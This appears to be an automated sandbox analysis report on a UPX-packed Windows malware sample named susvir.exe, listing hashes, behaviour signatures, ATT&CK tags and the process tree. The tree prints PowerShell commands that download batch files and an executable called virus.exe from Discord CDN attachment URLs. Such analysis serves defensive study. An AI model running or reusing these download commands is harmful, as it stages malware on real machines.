d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72

Analysis

max time kernel
131s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
06-02-2023 14:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

susvir.exe
Size

66KB
MD5

28df9a92d49e842d38a1714f7a4066f0
SHA1

e747b57bfda77395a30245bb7573c4a1025e3046
SHA256

d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72
SHA512

59b027ac5d29d763888b437339a6484b367fb055be2c182146c49c87ce0a64a8ef21007db41bae6bcf2ebbc434695bdaafc083f3d6878eaf1a7cb476a423652f
SSDEEP

1536:ipfEKNCj6VoJl9Go5K7s4Nu3Am8ryEpdg0IP6nouy8:iVZ/VGS7rN+AFry50Iaout

Score

10^/10

upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe

Signatures

Blocklisted process makes network request 14 IoCs

flow	pid	Process
5	2928	powershell.exe
9	2928	powershell.exe
30	2928	powershell.exe
44	2928	powershell.exe
46	2928	powershell.exe
48	4268	powershell.exe
49	4556	powershell.exe
50	5064	powershell.exe
51	1740	powershell.exe
52	2040	powershell.exe
53	3700	powershell.exe
54	4460	powershell.exe
55	4856	powershell.exe
56	2828	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	susvir.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3440-132-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/3440-138-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2928	powershell.exe
2928	powershell.exe
4268	powershell.exe
4268	powershell.exe
4556	powershell.exe
4556	powershell.exe
5064	powershell.exe
5064	powershell.exe
1740	powershell.exe
1740	powershell.exe
2040	powershell.exe
2040	powershell.exe
3700	powershell.exe
3700	powershell.exe
4460	powershell.exe
4460	powershell.exe
4856	powershell.exe
4856	powershell.exe
2828	powershell.exe
2828	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	5064	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	2040	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	4856	powershell.exe
Token: SeDebugPrivilege	2828	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 3440 wrote to memory of 2840	3440	susvir.exe	82
PID 3440 wrote to memory of 2840	3440	susvir.exe	82
PID 2840 wrote to memory of 2928	2840	cmd.exe	85
PID 2840 wrote to memory of 2928	2840	cmd.exe	85
PID 2840 wrote to memory of 4268	2840	cmd.exe	94
PID 2840 wrote to memory of 4268	2840	cmd.exe	94
PID 2840 wrote to memory of 4556	2840	cmd.exe	95
PID 2840 wrote to memory of 4556	2840	cmd.exe	95
PID 2840 wrote to memory of 5064	2840	cmd.exe	96
PID 2840 wrote to memory of 5064	2840	cmd.exe	96
PID 2840 wrote to memory of 1740	2840	cmd.exe	97
PID 2840 wrote to memory of 1740	2840	cmd.exe	97
PID 2840 wrote to memory of 2040	2840	cmd.exe	98
PID 2840 wrote to memory of 2040	2840	cmd.exe	98
PID 2840 wrote to memory of 3700	2840	cmd.exe	99
PID 2840 wrote to memory of 3700	2840	cmd.exe	99
PID 2840 wrote to memory of 4460	2840	cmd.exe	100
PID 2840 wrote to memory of 4460	2840	cmd.exe	100
PID 2840 wrote to memory of 4856	2840	cmd.exe	101
PID 2840 wrote to memory of 4856	2840	cmd.exe	101
PID 2840 wrote to memory of 2828	2840	cmd.exe	102
PID 2840 wrote to memory of 2828	2840	cmd.exe	102

C:\Users\Admin\AppData\Local\Temp\susvir.exe
"C:\Users\Admin\AppData\Local\Temp\susvir.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE3.tmp\7FE4.tmp\7FE5.bat C:\Users\Admin\AppData\Local\Temp\susvir.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3', 'pixel_sides_very_good.mp3')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3 -OutFile pixel_sides_very_good.mp3"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat', 'music.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat -OutFile music.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', 'no.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat -OutFile no.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', 'DO2.bat')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3700
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat -OutFile DO2.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4460
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe', 'VIRUS.exe')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe -OutFile VIRUS.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2828

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ef5ef35c3059825861b16409862d0e3d

SHA1
cde5311765478b1bcf309219c1a86a0238612099

SHA256
53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

SHA512
3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
497cf4a164cc2c626ad491b41f7640c3

SHA1
2131493e13172376668cd037b24ffd28641a80ba

SHA256
ddd86fc4f0b43845434ba46f81c7594f65e1dea1056ca5656af05b3ec9c1f72c

SHA512
8046ea6922ed04fd784a13e08a8982df9c042f784b2abfa84af81fee077924e2d5d312997d75179eba75817f4af9da287054efb5a9215d0a232985719c3c0555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8599add9bf9f4c5768c8415f79142f77

SHA1
a06c12a13cabf959b2604ff619940fa5f4c4130f

SHA256
c6efaad392e052ef2381877257df610f4e86d522bf03ffc0de6629d6a5cfe743

SHA512
af52a5da0060fae6bf876914c551b569ae5dd1d7f1cb7eb118ae422cc0c02137d9f48ad417bf5a999a42821c9d430bacaa533da57c0f5abce29d915689f66cd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
de558c635d1effb2172c19f59de545f3

SHA1
fa7a011c6f40b4febeb266a22a1c87761ca5fb6f

SHA256
e96206b0a9925fa9a4a54f9c750e7582a0c9d6938902fcde1f9207869fa75980

SHA512
c67e5ccd56cb6f0df1a9a83c3ce02d054df5009901d7fe4eeab24cc33812ee934f9b81b88bdca403154d44c1bc6a320074f32c9f9fc1fef8a94a397b70d85c94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5dcbaedbe3b85aa330eae19cc52de065

SHA1
a46763872090c53b455d4b266f5a2d98dc466ac4

SHA256
30924dae2900593b56e4dd117d4f294ad65e1f3033c5cf654ab8736dcece242f

SHA512
911bdc89d191f0d1fcbc0eb4545d1d67f459447308995ee1e12419867305fd48545278003ced02a4f3e4d714498ed7218b5ecf43b8f3576a98ac5914fa0d3933

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f160223354f05f4f0460fc4257cb9285

SHA1
7e67be250b82bee2ede4bdb14a47f9533599ea2e

SHA256
b12f317c4b4bf4171af3e48120c4e8a6ba71ab67a5c375664783785af2428ec3

SHA512
72ba289e54eb7de6397b99faa7271934f8a189eea0a75910545abfbc7f81c48efb92f1d0ed1c12687ddee9f2975c4bdffdfb6553db79a6ff4ca7e555f2934f09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6bce69f9f56b8c504eb9a9c7f2c5ca4b

SHA1
1c819b2ea3864cbb666a77b4f2d5fb1009c49ee6

SHA256
6757aaede7f2f40bb434be2ca0b8c4632987d46748e2bb57478a87f799cba392

SHA512
fb6a5d44d29fc07af84c53858732bfefc39731d14b1a11bdf61241d60b102507fa840f5dd55cdf19f4bf5d40a3b977a68ffee817078663108eaed1919adf9f93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a3096c8cde232538dbee8b1387b59fd9

SHA1
1364cffb6412675907d1dc0d2e6a9a9469d9a0f1

SHA256
f093bc514fcebb3cf14124cea968f337b1510f692997069d3ff8f906aea7a278

SHA512
6f6dbb8d46ecece8bd39e3cd83c84208e5a16dbad001912f972411bbb712a114d8444848905f851629e3d8c2b799e1028f380c149cab11f6c01351e5125b2afd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5d5dd663716fa7faf38267fb4dad20c1

SHA1
0db9cd0d16bb972256574ea803e08f26937f46c2

SHA256
9b9791360b239e8e25831a73a4ae99ded4f3a7cb3cdd918c2c89e4513bda6325

SHA512
3d90ba26e97430fc030d225d676191d22d3e3df7bf00c8e0ccff6bd5b2ae3c906fde2e12ced596f2b5ca17d9f684d7c70340fed727fbe5411a808dd2bf6b74aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7FE3.tmp\7FE4.tmp\7FE5.bat

Filesize
18KB

MD5
da14901fbd42e828503cc0f75847af52

SHA1
db49087447161b0fc6ee882dfc6906d1a9d1b96e

SHA256
8c2ff4915c53918275152048cf955f70fa23c531c88bd91f1e9b32c818bb9b7f

SHA512
8e8196a15a09f0b18e8d4e8d7d1c43c56c67ff2a32e58dc9746ea8d7a75679d38f255a683ea1c0d013d27a630e06f49f6e365a29cccaa327096669ed8d3d9154

Download Submit
memory/1740-157-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/1740-158-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2040-161-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2040-162-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2828-177-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/2828-178-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/2928-140-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2928-139-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2928-137-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/2928-136-0x0000016EC0E20000-0x0000016EC0E42000-memory.dmp

Filesize
136KB

Download
memory/3440-132-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3440-138-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3700-165-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/3700-166-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/4268-144-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/4268-145-0x00000135BAAD0000-0x00000135BB276000-memory.dmp

Filesize
7.6MB

Download
memory/4268-146-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/4460-170-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/4460-169-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/4556-150-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-149-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/4856-173-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/4856-174-0x00007FF8502C0000-0x00007FF850D81000-memory.dmp

Filesize
10.8MB

Download
memory/5064-154-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download
memory/5064-152-0x00007FF84FDF0000-0x00007FF8508B1000-memory.dmp

Filesize
10.8MB

Download